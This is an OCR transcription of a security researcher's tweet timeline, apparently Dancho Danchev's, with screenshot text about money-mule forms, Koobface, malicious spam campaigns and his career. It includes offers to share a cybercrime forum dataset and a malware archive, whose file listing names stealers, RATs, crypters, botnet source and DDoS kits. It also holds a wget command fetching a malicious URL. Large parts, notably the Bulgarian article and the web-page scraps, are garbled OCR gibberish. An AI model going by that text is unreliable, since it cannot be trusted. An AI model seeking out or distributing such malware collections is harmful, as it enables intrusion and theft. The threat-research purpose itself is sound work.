Hey @mikko - just came across to this from one of your presentations. Takes you 
back doesn’t it? - https://t.co/eole2CdhmD Cheers and keep up the good work! 
Regards. Dancho https://t.co/907TG4mqnNv 
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11:20 
Check this out! In retrospective - money mule recruitment at its best. - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/NrXvvU4Nes 
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11:20 


Check this out! In retrospective - money mule recruitment at its best - Part Two - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/4QHVvtBiExj 
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11:20 


Check this out! In retrospective - money mule recruitment at its best - Part Three- 
https://t.co/JTcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/HcPrwm1g3K 


Transfer type: Western Union 
First Name: 

Last Name: 

City: 

Country: 

Reference Number (MTCN)*: 908 . 547 .5754 ?) 
Western Union fee (USD)*: 600} 

First Narne*: John 

Last Name*: Blackmore 
City*: New York 
Country*: United States 
Comments: 
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Check this out! In retrospective - money mule recruitment at its best - Part Four - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/8qFFd8fSRB 
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Check this out! In retrospective - money mule recruitment at its best - Part Five - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/ADpnBovMzF 
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11:22 


Check this out! In retrospective - money mule recruitment at its best - Part Six - 


11:25 


This is me doing cybercrime fighting collages. Enjoy! - https://t.co/JTcqOaYgET 
#ThreatHunting #Threatintelligence #Threatintel https://t.co/irtjaGmaqlw 


Hanmenosanne 


Braankn, dopmel, tabanypt 
Application form (ENG) 
Application form electron. (ENG) 
Application form short (ENG) 
ConposoauTenbHas dopma ans oTnpasneHma MG (ENG) (ONE) 
ConposogaMTenbHas dopma ana oTnpaBneHia MG (ENG) (SPLIT) 
ConposogaMTenbHas dopma ans oTnpasneHna WU (ENG) (ONE) 
ConpoBogMTenbHas dopma ana oTnpasneHma WU (ENG) (SPLIT) 
Espanol 
Formulario de Inscripcion (ESP) (.DOC) 
ConpoBogMTenbHas dopma ana oTnpasneHma WU (ESP) (SPLIT) 
®opma ana GaxKosBckMx geTanen (ESP) (EEUU) 
®opma Ana oTNPaBNeHHOrO Nepesoga WU (ESP) 
Italian 
Application form (ITAL) 
ConposoauTenbHas dopma ana oTnpaBneHna WU (ITAL) 
®opma ans GaxKoBcKMx geTanen (ITAL) (EU) 
®opma ana oTNpaBNeHHoro Nepesoga WU (ITAL) 
@opmpi ana GankoscKnx feTanei 
Bank Details Form /IBAN/ (ENG) 
Bank Details Form /AU/ (ENG) 
Bank Details Form /CA/ (ENG) 
Bank Details Form /UK/ (ENG) 
Bank Details Form /US/ (ENG) 


https://t.co/JTcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/2vxqOiRd2i 
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This is me doing cybercrime fighting collages - Part Two - Enjoy! - 
https://t.co/JIcqOaYgET #ThreatHunting #Threatintelligence #Threatintel 
https://t.co/bYaSCw5ed7 
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This is the infamous https://t.co/SSokKe9VBHr under my management circa 
2003-2006. Here’s a copy of the actual Security Newsletter which | used to produce 
there on a monthly basis - https://t.co/PGLUftNfUs [PDF] https://t.co/FlyQeYvPkq 


Home Top 10 Tools Seasrity Directory Security News Tutorials Geeky Photos Links About Astalavista Sitemap 


, eek nese actmerk secur irom a hecher 2.netet of xiew with SF LANouard N.S.S.1 


+-virws/ anti 


Underground Search v 


( sonesh [eet } become 2 member } 
stalavista_nct member 


Linking to A: Lom! 180Sobutions From The Inside Out 

We are always looking for mew stuff! Sabmit it to us! Interview 

Contact us, and share your thoughts about our site! (In)Secure Mag 6 

Astalavista FAQ, read it before contacting us, tro! Virus Top Twenty for March 2006 
Asta’s Security Best Practices for Configuring Group 

New to Astalavista.com? first tme visitor information Policy Objects 

Advertising Opportunities Advertise at Astalavista Hook£ xplorer 

Astalavista Flash Movie 2004 Check it out! Blue Screens of Death Gallery 

Astalavista Flash Movie 2005 Feel the spurt Visualization in the Secunty and New 

world 


AfterGlow 


Company Touts Low-Cost Facial Recognition The v de of fear andt 


US takes interest in DDoS attacks } 
Seven arrested in online fraud crackdown a wT 
IAT rootkit 
We suggest you try out UseNeXT - dsl speed downloading, BR Identity theft het 3.6 millon in U.S. Interview with Pete Herzog 
janonymous & 100% legal access to the usenet. Over 80 TB A Pretty Good Way to Foil the NSA The Top 10 Inf tion Sec h 
available in the following categories: Why phrshing rec punters mn = vy Myths 
sfools Eliminating Steganography in Internet 
Movies (964,421 files avaiable) 3) = Traffic with Active Wardens 
. Mp3 charts (486,904 files available) : FR Fidelity laptop snafu spotlights need for scasrity poboes JXTA P2P 
E Gemes (8,042,782 files available) Police: Mave E Sec DemTs, not afraid to use them VMware Virtual Machine Importer 2.0 
- Ap ons (207,141 files available in eta Prosar 


12:40 
https://t.co/UZ6qVAhNXVE https://t.co/Ywm7 7JrSPh 
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Webroot Inc. 


DANCHO DANCHEV’S 
SECURITY RESEARCH 
FOR WEBROOT INC. 


In-Depth Overview and Analysis 
of Security Blogger Dancho 
Danchev's Security Research for 
Webroot Inc. Circa 2012-2014 


12:41 
https://t.co/UZ6qVANXVE https://t.co/wieh20mQtx 
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12:43 


Dancho 
Danchev's 
Security 
Research 
Compilation 


“Never-published before security research articles 
and OSINT analysis at Dancho Danchev's Medium 
account” 


By Dancho Danchev 


https://t.co/JTcqOaYgET https://t.co/20yGpiGg2!| 
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white hat info 
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https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #threatintelligence 
https://t.co/R8P2B5bBQA 
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https://t.co/JTIcqOaYgET #ThreatHunting #Threatintel #threatintelligence 
https://t.co/KRBeyVeg69 
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https://t.co/JTIcqOaYgET #ThreatHunting #Threatintel #threatintelligence 
https://t.co/DRrnOX2Wbj 
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https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #threatintelligence 
https://t.co/oDUqPGW6Z9 


CREATION DATE ~ 
Feb 20, 2022, 1:3a:18 AM 


Feb 20, 20272, 1:38:16 AM 


MARONG 


23:13 


https://t.co/JIcqOaYgET #ThreatHunting #Threatintel #threatintelligence 
https://t.co/ZB7ONiINSWH 
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@DaveMarcus Awesome. Thanks for sharing this! 


https://t.co/JTcqOaYgET https://t.co/m9MUSY26nT 
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Feed Stats Dashboard Show stats for [alltime >| 


12000 1600 
9000 
6000 
3000 


0 


2010 2015 


Wednesday, December 14, 2005 — Saturday, September 14, 2019 


+ 2,888 subscribers (on average) 8 
¢ 457 reach (on average) @ 


See more about your subscribers » 


Popular Feed Items 


NAME VIEWS CLICKS 

Total 1,557,394 6,377,221 
Historical OSINT - Malicious Malvertising Campaig... 1463 71028 
Historical OSINT - Massive Black Hat SEO Campaign... 1397 70766 
Historical OSINT - Google Docs Hosted Rogue Chrom... 1402 70669 


See more about your feed items » 


23:53 


Me in the news. https://t.co/JIcqOaYgET #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/LClOnvnsg4 


942 


23:53 


Fake CNN Alert Still Spreading Malware 
@©OC00000 


By Geogg Ketzor 


eh) 


The massive attack that has infected PCs by tricking users into clicking links 
i fake messages from CNN.com shows Ettle sign of ending soon, security 
researchers say. 


MORE UKE Ths 


Fake News Bulletin Spreads Malware 


According to MX Logic Inc, , spam posing as CNN.com Top 10 fats peaked at ye errs agers 


close to 11 milion messages per hour early Thursday, but remained at high 10 Quick Founs for the Worst Secunty 
volumes throughout the day Friday. The Colorado security vendor said it had Naghonares 
been tracking an average of 6 million messages per hour since midnight. waeo 

Why You Lost Your Windows 10 
MX Logic’s vice president of information security, Sam Masiello , called the Product Key 
trend “a very slow, but steady decline” from the 11 a.m. Mountain Time peak 
the day betore 


Further reacting: How the new age of antvirus sottware wal protect your PC 


Masiello also said that the spam has changed since attacks wore first 
launched on Tuesday. “We've also seen several morphs of this spam over the 
past couple of days,” he said in an entry posted on the MX Logec blog Friday . 
Where the messages once trurnpeted ~ CNN .com Daily Top 10° in the 
subject heading and finked to a single filename on malware-hosting sites, now 
the spam sports a subject reading “CNN Alerts: My Custom Alert” and uses a 
vanety of filenames in the malicious UAL. 


Me in the news - Part Two - https://t.co/JIcqOaYgET #ThreatHunting #Threatintel 


#Threatintelligence https://t.co/4Kz7GO1BEU 
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Sony PlayStation site victim of 
SQL-injection attack 


Automated attack claims another high-profile target, offering 
sale of a fake antivirus scanner. 


Oy MORERT VAMOS © fuiY > 20081) Se AM POT ‘ y o os = 


to the Sony PlayStation se may have been prompted to download an 
antivirus scanner, 


| Early Wednesday. antivirus vendor Sophos reported that some visitors 


Pages promoting the PlayStation games SingStar Pop and God of War contained 
SOL-injected code, Vistors to those specific game pages would see 4 tnke 
antivirus scan, then 4 message that the computer was infected with different 
viruses and Trojan horses, Warned, the user would then be asked to purchase the 
scanner to remove the bogus mahware. 


Tho injected code Sinking to the scanner has since been removed. 
Sophos said the attock could have downloaded malicious payloads, but dki not 


Security researcher Doncho Oanchey said in his ZDNet biog that Sony wasn't 
alone, It was one of 794 domains Mt in the lntest automated SOL-injection 
Campaign using 6 muftiieyer fost flux superstructure built around cokiwoo.com. 
Over the last 90 days, Google reports that 794 domains have been infected with 
code pointing to that domain. These are legitimate sites with vulnerabilities that 
allow criminal hackers to inject code pointing to thee servers 


23:54 


Me in the news - Part Three - https://t.co/JTcqOaYgET #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/ntMjFWWofE 
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Me in the news - Part Four - https://t.co/JIcqOaYgET #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/3mOSKsBMpr 
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The Cybercrime Econony 


NBC hack infects visitors in ‘drive by' 
cyberattack 


by Julianne Pepitone @juipepitone 


(4) Fetruary 23, 2083 951 AMET ==mO@0O08 
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Me in the news - Part Five - https://t.co//TcqOaYgET #ThreatHunting #Threatintel 
#Threatintelligence https://t.co/5q6MQLhEQD 


Web Gang Operating in the Open 


By RIVA RKHMOND JAN A Die? 


Five men bebeved to be responsiie for spreading 3 notorious computor 
worm on Facebook and other social networks — and pocketing several 
mélion dollars from online schemes — are hiding in plain sight in St 
Petersburg, Russia, according to investigators at Facebook and sevoral 
iopendent computer security researchers. 


The mon live comfortable Bves in St. Petersburg — and have froicked on 
hunury vacations in places like Monte Carlo, Bali and. earter this morth, 
Turkey, according to photographs posted on social network sites — even 
though their idertities have been known for years to Facebook, computer 
Security investigators and law enforcement officials 


One memider af the group, which is popularly known as the Koobface gang. 
has regularly broadcast the coordinates of its offices by checking in on 
Foursquaro, a location-based social network, and posting the news to 
Twitter. Photographs on Foursquare also show other suspected menbers 
of the group working on Macs in a loltlike room that looks Ske offices used 
by tech start-ups in C&es around the works 


Boginning in July 2008, the Kooblace gang aimed al Web users with 
trvitations to watch a fanny or sexy video. Those curious enough to click 
the link got a message to update their coenputer's Flash software, which 
begins the download of the Kooblace malware. Victims computers are 
dratiod into a “botnet,” or network of infected PCs, and are sent official 
looking advertisements of fake antivrus software and their Web searches 
are also hacked and the cicks delivered fo unscrupulous marketers. The 
group made money from people who bough the bogus sofware and tom 
unsuspecting advertisers 


The security software firm Kaspersky Labs has estimated the network 
includes 400,000 to 800,000 PCs workiwide at Bs height in 2010. Victiens 
are offen unaware thelr machines have been compromised 


23:56 
https://t.co/JTcqOaYgET https://t.co/fn9s22egtr 
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Folks. Who wants to do some serious data mining based on my official 36GB 


VW KABEPBOUMHUTE - 


maka © 6 pazyznafamennume cekmop 
¢ Giguodno ga ce wworupe wewsm 


wartace) nocmatiuca mavancmo ma mote 
2,20 618 Gormeama ucmopus, no ceo 
suka u omfopuxa Guyeaksoonms » 
manece 6 megu honey sche ~ mascecs, 
hasmo e cnacotma gs mpuwaru ucmun- 


sofegqumes 6 grewsus chepyas diam 
Sposm u ciuama na aqpenume ope dum, 
Gaaame yospia caus na apwusms so 
gagrns Cmpass mam Cmatmocn, sho 
ce pay6u koumpoum nag mex Cruo- 
mo cf Omna u 3a npuxfisuianemo © 
Qawuguuupasemo ma umpopua uu 
nogatana kee max - mala naperenume 
ELINT cmpameaue, 2 uwenno mexep- 
somuume nofoubsus na enundy 


? acumem pees, wouoncku u npone 
vagy Goerses getcrBus, khoumo ca 
8 cremomee gs newexsm gexs Godse: 
CacGiatku wakeumams na Gevskue 
kumatcks Boemen mucumes Cue Ip 
— “Ulnwama Goan ¢ Gazipana ma wab- 
jus’, kubepnpocmpancmiomo ceyage 
GezGpon mpequucefe 32 prfumume 
mauey, no Cuno suke nofiow uw ma 
payboBame ce manuy, paySupsne 


gQeemmume npius 3 Goren cau 


KAKBO E KMBEPTEPOP HS MbT? 
C maBwyaremo ua cBems 6:8 21 


+ @& epewocam m2 enpopusaus npegosu 


noBu uprepenus. Cmana Ge zeakuo 33 


Gmem ie Ormke, on samupsuiue 
ce ff Gegypa ugmpedumes uw om 
Goduuk na Godname ma Cryo maka 
cmana Sygwakno y2 mepopecnuna 
Opeamysees ge usfeps «enole, ga 
pappocn pana sponarsuge, Bago 
Mamepuass, Gpanypa mpenupé wens 
mamepuass Bypiakw ¢ u loopquas- 


- pasemo = mepopumews aknde 6 


annua u unmepokmufna exckm 


cumyaauama apeg cee, uppauam om = pon gopua. 


Qereme caumoSe (Oi0S), Yrenegmem Gasupa upaa pEIMpocpaneue na mupemche 
Copeyen u goye Gig wenertiemyanns cobemBenmom, paanencepaneiiane ms mporpane © 
WO premeebaner> WU TOTO MET ROG 1 UIgCOaL UE GS 

Ku Gepe epopaatee - NOOg\AEMUETO Ha MEDODUOTAEE: geunoony 6 LGroncmo™oarK: 
mGomo" uw Beso roceramencenGo Gapry Loy rAuuOreLne U UnISOOMBU net DECyDaU 
ma Gagena Comma ¢ unt GrckUpanEnO ma sLoreNCSaty CUCMEME Wu ROODGUMUDENETO 
a mace, Garipaeo re COuwe Wu Ujpoonects Coes 

KuGepSowe - cron na epormauceeems lowe, lorto cave no cebe cu rpegomal 


Ku Geppas yonetiae - KOnQaLOiee na UNgooManuus Memgy HUMINT SGINT BUNT u goyau 
CUB nogUtnN Tae Mt KOM ALARUUTE MOK Gy DRLAAORIMS Sere 

Nicwscaceue onepeuus (PSYops) - mpegemuBsuan soopguepa ncuooruvedies 
QovceBur ¢ un noc ns MOBegeerTS uty pap 
a "pom Deka mga fagee nocmuETY UTE Hn gagra 
o7rOmre WL CORI 

Exckmporee pasysneGane (ELINT) = wncaGine na ercempoe 
mu cpegomia 22 Grctepane, cou Gaumne u uogupuepane ne 


fume ca 6 sabpmeene at mmx sou, puckoGeme ca CepoNets mo 
Cripamemns ungqemas nee 2: orpaigeia 


Clo 61 


Cybercrime Forum Data Set for 2021? Drop me a line at dancho.danchev@hush.com 


and | would be happy to offer access for research purposes. #Threatintel 
#Threatintelligence #ThreatHunting https://t.co/jmYAvAaWH7 


*1 


949 


<parent> Darkmoney iHonker ShadowMarket 


11Wang DarkWeb LinkFeed SkyFraud 
365Exe DomenForum Linuxac.org Spyhackerz 
419eater Eviloctal Master-X Svuit.vn 
4HatDay Exelab MasterWebs Szenebox 
aHack Forum-UINSell MaulTalk Szuwi 
Aljyyosh Forum.Zloy.bz Mmpg.ru Tenebris 
Antichat.ru ForumSape = Mr11-11mr.7olm.org TheBot 
ArmadaBoard ForumSEO Nullnoss.org Toolbabase.se 
BigFozzy Free-hack pay-per-install.org TotalBlackhat 
BlackhatWorld ghostmarket.net PhreakerPro Turkhackteam 
BPCForum Gla.vn Piratebuhta.pw Vsehobby 
Cardvilla GoFuckBiz ProCrd Webmasters.ru 
Chf gofuckbiz.com ProLogic Whitehat.vn 
CNHonker H4kurd.com Promarket WWH-Club 
CNSec Hack-Port ProxyBase www.opensc.ws 
Crack-Forum Hackersoft scamwarners Xakep.bg 
Cracked.to Hackingboard SEOCafe Xakepok 
Cyberizm Hackings SEOForum Zismo 
Darkmarket.la iFud 


19:46 


Folks. Who wants to do some serious data mining based on my official 36GB 
Cybercrime Forum Data Set for 2021? Drop me a line at dancho.danchev@hush.com 
and | would be happy to offer access for research purposes. #Threatintel 
#Threatintelligence #ThreatHunting https://t.co/FDRfptXxtgj 


BB carders.ws 784,042,156 
Ld cccc.ug 204,942 134 
| | erdclub.su 72,086,747 
L] blacknetworld.com 25,444 394 
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Folks. | also got a second collection which consists of cybercrime-friendly tools 
coming straight from the source. Interested in obtaining a copy for research 
purposes? Drop me a line at dancho.danchev@hush.com #Threatintel 
#Threatintelligence #ThreatHunting https://t.co/VYHP8BXDdd 
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in HacPack_01 Compressed (zipped) Fol... 730,598 KB 


| 
[=] Archive_01 PowerlSO RAR File 655,805 KB | 


[=] Tools PowerlSO RAR File 259,264KB | 
[m] HackPack PowerlSO RAR File 175,814KB | 
[=] Malicious_Software_RATs_Cybercri.. | PowerlSO RAR File 166,073 KB | 
[m=] Tools_01 PowerlSO RAR File 138,313KB | 
ire) Sources-delphi_crypters_packers_r... © PowerlSO RAR File 135,925KB | 
[m=] Stealer Pack DarkCoder14 PowerlSO RAR File 108,583 KB | 
[i] Bots-2 PowerlSO RAR File 83,852 KB | 
[=] spam_tools PowerlSO RAR File 69,338KB | 
[=] spamming_tools PowerlSO RAR File 69,338 KB | 
[m=] BotNet.Source.Codes PowerlSO RAR File 68,373KB | 
[=] Malicious_Software_RATs_Keylogge... PowerlSO RAR File 68,199KB | 
[a=] Ashiyane_Security_Team_Group_H... PowerlSO RAR File 59,751KB | 
[=] Malicious_Software_Keyloggers_Cr... PowerlSO RAR File 56,337KB | 
[i=] TDoS_Attack_Tools_Compilation PowerlSO RAR File 23,822 KB | 
[=] botnet-ddos PowerlSO RAR File 12,227KB | 
[=] Malware_Crypters_Source_Code PowerlSO RAR File 9944KB | 
[=] Malware_Crypters_Source_Code_01 PowerlSO RAR File 6,371 KB | 
[| Stealer PowerlSO RAR File 4657KB | 
[m=] Mujahedeen_Secrets_Encryption_T... PowerlSO RAR File 3,161KB | 
RazStealer 2 Cracked PowerlSO RAR File 28KB | 


31 - Wednesday 


03:28 


My latest white paper for @whoisxmlapi - https://t.co/8e7ZfePXa8 #Threatintel 
#Threatintelligence #ThreatHunting 


09:48 
Cheers! #Threatintelligence https://t.co/yzKZ4rBg Of 


*1 
951 


Dancho Danct 


Webroot 
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Dancho Danchey 


15:36 


My latest white paper for @whoisxmlapi - https://t.co/o3aOKOOA7F #Threatintel 
#Threatintelligence #threathunting 


September 


1 - Thursday 


07:43 


My latest white paper for @whoisxmlapi - https://t.co/oRO5Z5ajvC #Threatintel 
#ThreatHunting 
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22 


18:52 


19:27 


3 - Saturday 


09:31 


*1 


https://t.co/JTcqOaYgET #security #cybercrime #malware #Threatintelligence 
#Threatintel #threathunting https://t.co/vwtyjomsHt 


Ma LOVELY HORSE @ 
@iovelyhorse 


https://t.co/2U427m48jE #Threatintelligence #Threatintel #threathunting 


Me Inc. https://t.co/glUyYxYIIR 
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From an Original Participator in a Top Secret U.S 
Government Program to Monitor Hackers Online 


A PERSONAL TRIBUTE TO HOW ONE MAN 
BASICALLY “PHONED-BACK”" AND ACTUALLY GOT 
A POSITIVE RESPONSE 


"CALLING HOME" - 
OR WHEN THE 
ECHELON STATION 
TALKS BACK 


BY DANCHO DANCHEV 


19:02 


Who wants access to my 36GB Cybercrime Forum Data Set for 2021? Drop me a line 
at dancho.danchev@hush.com in case you’re interested. Regards. Dancho 
https://t.co/grx86i9LWe 
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19:02 


| also have a second compilation of tools of the trade courtesy of the bad guys 
coming straight from the source which | would be willing to share for research 
purposes. Drop me a line at dancho.danchev@hush.com in case you're interested. 
Regards. Dancho https://t.co/et4p15UZNQ 
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HacPack_01 Compressed (zipped) Fol... 730,598 KB 


| 
[cs Archive_01 PowerlSO RAR File 655,805 KB | 


[m=] Tools PowerlSO RAR File 259,264KB | 
[m=] HackPack PowerlSO RAR File 175,814KB | 
[==] Malicious_Software_RATs_Cybercri.. | PowerlSO RAR File 166,073 KB | 
[=] Tools_01 PowerlSO RAR File 138,313 KB | 
[==] Sources-delphi_crypters_packers_r... | PowerlSO RAR File 135,925 KB | 
[=] Stealer Pack DarkCoder14 PowerlSO RAR File 108,583 KB | 
[m=] Bots-2 PowerlSO RAR File 83,852 KB | 
[=] spam_tools PowerlSO RAR File 69,338KB | 
[=] spamming_tools PowerlSO RAR File 69,338 KB | 
[m=] BotNet.Source.Codes PowerlSO RAR File 68,373 KB | 
[i=] Malicious_Software_RATs_Keylogge... PowerlSO RAR File 68,199KB | 
[m=] Ashiyane_Security_Team_Group_H... PowerlSO RAR File 59,751KB | 
[ne] Malicious_Software_Keyloggers_Cr... PowerlSO RAR File 56,337KB | 
[=] TDoS_Attack_Tools_Compilation PowerlSO RAR File 23,822 KB | 
[m=] botnet-ddos PowerlSO RAR File 12,227KB | 
[m=] Malware_Crypters_Source_Code PowerlSO RAR File 9944KB | 
[=] Malware_Crypters Source Code_01 = PowerISO RAR File 6,371KB | 
[| Stealer PowerlSO RAR File 4657KB | 
[=] Mujahedeen_Secrets_Encryption_T... PowerlSO RAR File 3,161 KB | 
[m=] RazStealer 2 Cracked PowerlSO RAR File 28KB | 


4 - Sunday 


05:01 


Join us today! Apply for access to @whoisxmlapi Law Enforcement feed and let’s 
catch some bad guys! Enjoy! https://t.co/n6LlhftIm3 https://t.co/DvVOMQCifFw 
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@) WhoisxMLapi [ signup 


Law Enforcement Related links v 


Apply for Access to the Law 
Enforcement Nautilus Feed 


The Law Enforcement Nautilus Feed is a private subscription and collaborative service 
that offers in-depth technical analysis and attribution of curated lists of Indicators of 
Compromise (IOCs) and Articles of Interest (AOls) linked to major malicious 
campaigns and APT groups. 


The service is available exclusively to law enforcement, government agencies, 
licensed private investigators, and security organizations. Please start the enrollment 
process by applying for access. 


https://t.co/fnswrm8KWP https://t.co/RgkTknCeBQ 


herdProtect 


13:00 


Who wants to participate ina Q&amp;A with me? Where are the Qs? 
https://t.co/JIcqOaYgET 


13:01 
"Sharing is caring". And we’ve been doing it since the early days of humankind. 
13:02 
Who's the first pioneer in the on demand business model? It’s IBM. 


13:04 


Just found out that https://t.co/wHPszdkghv page links to SEC’s Fillings page. I’ve 
been visiting it for research purposes since my student years. 


13:27 


Check this out - "Covert Blogs and Military Information Strategy" - 
https://t.co/ZB1WFXxEESZ do you think you fit in? 


13:30 


Every OSINT conducted every information warfare campaign launched every 
disinformation attempt detected is a successful counter-cyber operation. 


*1 
13:31 


There’s a saying "An OSINT conducted is a tax payer’s buck saved somewhere". 


*1 
13:33 


Folks. Are you online? Who has questions about my research? Fire them here. 


14:47 

Hey @HBGary - https://t.co/E5JIRzZTddC Awesome! CC: @Greghoglund 
5 - Monday 
00:20 


Thanks for all the RTs. Drop me a line at dancho.danchev@hush.com if you want to 
obtain access to my Cybercrime Forum Data Set for 2021. Happy data mining. CC: 
@DaveMarcus https://t.co/vwxw3WJMoS 
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6 - Tuesday 


23:27 


Trying to claim my Google Knowledge Panel. https://t.co/ao0mUww0zS 
https://t.co/1tMfGVOebW 
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Dancho Danchev 


Researcher 


Dancho Danchev is an independent security 
consultant and cyber threats analyst, with 
extensive experience in open source intelligence 
gathering, and cybercrime incident response. 
https://www.zdnet.com > meet-the-feam >» ddanchev 
Dancho Danchev | Meet the Team - 
ZDNET 


@ Claim this knowledge panel Feedback 


7 - Wednesday 
23:11 

My latest white paper for @whoisxmlapi. Enjoy! https://t.co/ZhZeE127Br 
8 - Thursday 


08:49 


This is me rocking the boat. Keynote here - https://t.co/H7ZRZUN59S always yours 
and forever here - https://t.co/JTcqOaYgET https://t.co/TFad5LiQIlO 


> wget http://artquide.co il/267/g.php 


Resolving artguide.co.il... 62.128.52.211 

Connecting to artquide.coil[62.128.52.211]}-80... connected 

HTTP request sent, awaiting response... 302 Found 
ocation: http://ddanchev_blogspot.com/ [followin 


Resolving ddanchev.blogspot.com... 74.125.19.191 
Connecting to ddanchev._blogspot.com[74.125.19.191]:80... connected 
HTTP request sent, awaiting response... 200 OK 


08:55 
I’m popular. #threatintel https://t.co/20qbDJy500 
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Wo 20 OTTP antinshwarcoriinescanneryS.com fi fimaliquery. i 55,746 applications... 
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fs) i2 HTTP srte se b.ot 1,211 Qe/oF 

u 13 200 —OTTP ctiaaeindiearannicnes Hangheltegs 13,220 apphcationy... 


09:00 


From the I’m popular but from the no comment department. https://t.co/JTcqOaYgET 
https://t.co/rjlxixkyQa 


Our team, so often called “Koobface Gang". expresses high gratitude for the help in bug fixing, researches and documentation for our 
software to: 


® Kaspersky Lab for the name of Koobface and 25 millionth malicious program award; 

® Dancho Danchev (http://ddanchev. blogspot.com) who worked hard every day especially on our First Software & Architecture version, 
writing lots of e-mails to different hosting companies and structures to take down our Command-and-Control (C&C) servers, and of 
course analyzing software under VM Ware: 

Trend Micro (http i//trendmicro.com), especially personal thanks Jonell Baltazar, Joey Costoya, and Ryan Flores who had released a 
very cool document (with three parts!) describing all our mistakes ve've ever made; 


Cisco for their 3rd place to our software in their annual “working groups awards"; 
*® Soren Siebert with his great article; 
@ Hundreds of users who send us logs, crash reports, and wish-lists. 


In fact, it was a really hard year. We've made many efforts to improve our software. Thanks to Facebook's security team - the guys made us 
move ahead, And we've moved. And will move. Improving thefr security system, 


By the way, ve did not have » cent using Twitter's traffic. But many security issues tell the world we did. They are wrong. 

Az many people know, “virus” is something awful, which crashes computers, steals credential information as good as all passwords and credit 
cards. Owr software did not ever steal credit card or online bank information, passwords or any other confidential data. And WILL NOT EVER. 
As for the crashes... We are really sorry, We work on it 1) 

Wish you @ good luck in new year and... Merry Christmas to you! 


Always yours, “Koobface Gang”. 


09:03 


Who wants to quote me? This is best of the best in the world of cybercrime. Here’s 
the analysis - https://t.co/bYBreqvUVV #threatintel https://t.co/JKjcqlptdt 


09:06 


Courtesy of @Avast. Attending a journalist meeting for @ZDNET in Prague circa 2010. 
CC: @AvastVlk the pleasure is all mine. https://t.co/oUKWy93Ap} 
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09:07 


Heading to a conference event circa 2010. https://t.co/1Gkmnq3uSr 
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09:09 


*1 


At the height of my career. CC: @Webroot https://t.co/f7MXlgvgav 


963 


09:11 


Presenting on Cyber Jihad for @Webroot at RSA Europe 2012. I’m on my own. 
https://t.co/2YTgt7HclA 
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09:13 


Always yours. https://t.co/JTcqOaYgET https://t.co/JPh4CSF2jM 


09:16 
Rocking the boat at @CybercampEs. Don’t mind the badge. https://t.co/3AlblIEnfpD 
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09:27 


Awesome. #threatintel https://t.co/evR71pX7YN 
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SO7STA1046, 5 oad php exe WOTST41046_6.losd ghp.cxe 


09:28 


Over 3,000 emails taken offline. Talk to me about ransomware gang affiliates. 
https://t.co/ci2QfVZQiJ 
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09:30 
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18:54 2 @ + Mo“ 40 


< Tweet 


Dancho Danchev @dancho_... - 11 Nov 20 

9) New Post - "Exposing Protonmail and 
Tutanota's Illicit Abuse by Ransomware 
Gangs - A Compilation of Currently Active 
Ransomware-Themed Email Addresses” - 
is.gd/NPLLq5 CC: @ProtonMail 
@TutanotaTeam #security #cybercrime 
#malware #Threatintelligence 


O 3 n © 2 < 


S& Tutanota 
@TutanotaTeam 


Replying to @dancho_danchev and @ProtonMail 
Thanks for reporting and for sending 
the list early on via email. We have 
investigated and blocked abusive 
accounts already. It's always 

best to forward abusive emails 

to abuse@tutao.de so we can act 
immediately. 

19:16 - 11 Nov 20 - Twitter Web App 


1 Quote Tweet 


>) tv Qg os 


Tweet your reply (9) 


Awesome. #threatintel https://t.co/ICeNePdtAP 
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09:33 


970 


18:54 O  @ + eo” 40 
€ Tweet 


t You Retweeted 

TN} NETRESEC 

Ny @netresec 
Our #SUNBURST STAGE2 Victim 
Table (orgs actively targeted by the 
threat actor) has now been updated 
to include "paloaltonetworks*". 
The internal AD domain for GUID 
22334A7227544B1E was discovered 


in passive DNS data published by 
@dancho_danchev. 


oun avSYENCIOU Com Timestamp AD Demsain 
Subdomain (utc) 
DOGQBAFELIESIO7AL —AntvteSqmor7/Mpegs! 30 
149 


E288332829820721 —LeecioooRuBAeSy 2020-07-18 
05:00 
SCI2TLATETGESEAS — kSkcubeansssQat7gn3 22 
17:09 
SCIZ714787GEGEAL «6 idoscksacciPew hcp “23 
Ts) 
SDIBSTCSAOOTOGDA 4q7béeatmabhigh6es 2020.06.06 
1809 
22BMATZZTS44B1E — SqpqOtechpGugtnose 29 patoanonenworks* 
04:09 
Tweet your reply (e) 


When | used to be popular. https://t.co/YSOjK640xxX 


14:29 & & . Mota 


February 15, 2011 


SC Social Media 
Awards 


‘a . (* C) € ryry 

Me ae Ps Xs 

Best Security Blogger: Graham Cluley, senior 
technology consultant at Sophos, for the Naked 


Security Blog 


Best Corporate Security Blog: Trend Micro's 
TrendLabs Malware Blog 


Five to Follow on Twitter: 


¢ @cyberwar and @stiennon (Richard Stennon, 
chief research analyst of IT-Harvest) 

¢ @George KurtzCTO (George Kurtz, worldwide 
CTO of McAfee) 

¢ @danchodanchev (Dancho Danchev, 
independent security consultant) 

© @jeremiahg (jeremiah Grossman, founder 
and CTO of WhiteHat Security) 

© @owasp (the Open Web Application Security 
Project) 


NEXT POST IN EVENTS 


RSA Conference 2011: Terrorist organizations pose great« 
cyberthreat 


09:34 
Making the headlines at Wikipedia Hungary. https://t.co/oMknsl61ph 
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22:51 & Eh @ « of 40 


OQ  @ hu.mwikipedia.org/wiki/Astala @ i: 


Astalavista.box.sk 


Page type search engine 
Categories search page 
Available language (s) English 
Establishment 1994 
Editor-in-Chief Dancho Danchev 
URL box.sk 


The website operated under a Slovak domain name . 
The name of the website is based on a movie pun. In 
the sci-fi action movie Terminator 2 - The Day of 
Judgment , the protagonist's character had a 
memorable phrase, “Hasta la vista, baby,” a phrase in 
Spanish that is a commonly used farewell formula. 
The “astalavista" of this sentence is the merging of 
the player. It's worth noting that AltaVista , another 
well-known search engine of the era that sounded 
similar , was only launched in 1995. '! 


In December 2020, cybercrime researcher and 
analyst Dancho Danchey, as the operator of the site, 
